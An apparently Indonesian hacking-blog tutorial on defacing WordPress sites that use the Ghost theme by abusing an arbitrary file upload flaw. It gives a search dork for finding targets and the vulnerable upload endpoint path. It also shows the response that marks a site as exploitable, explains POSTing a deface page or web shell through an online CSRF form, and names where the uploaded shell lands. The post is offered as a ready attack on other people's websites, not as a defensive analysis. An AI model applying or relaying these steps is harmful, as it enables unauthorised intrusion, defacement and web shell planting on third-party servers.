Beranda
deface

Cara Deface Poc Wp Ghost Theme - Arbitrary File Upload

 Pada kesempatan kali ini saya akan memberikan tutorial cara deface menggunakan metode Wp Ghost Theme - Arbitrary File Upload

Dork :

  • inurl:wp-content/themes/Ghost/

Kembangin lagi

Xploit :

  • /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

 

Pertama kita ngedork dulu

Pilih salah satu websitenya

Kalian masukan Xploitnya

https://co.li/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Kalo Ada Tulisan

{"status":"NOK", "ERR":"This file is incorect"}

 Kemungkinan besar vuln.

Setelah itu, kalian masuk ke dalam csrf kalian, di sini saya menggunakan csrf online

Di bagian URL di isi dengan link targetnya, di bagian POST File di sisi dengan Filedata

URL : https://co.li/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
POST File : Filedata

Terus pencet kurci target

Kalian upload scrpit deface/shell kalian

Jika seperti ini maka berhasil.

Cara aksesnya seperti ini

http://co.li/wp-content/uploads/settingsimages/sckalian
 

Sekian tutorial kali ini

Aku Iri Dengan Mereka Yang Di Banggakan Oleh Pasangannya

Posting Komentar

© Destroyer Cyber Security. All rights reserved. Developed by Jago Desain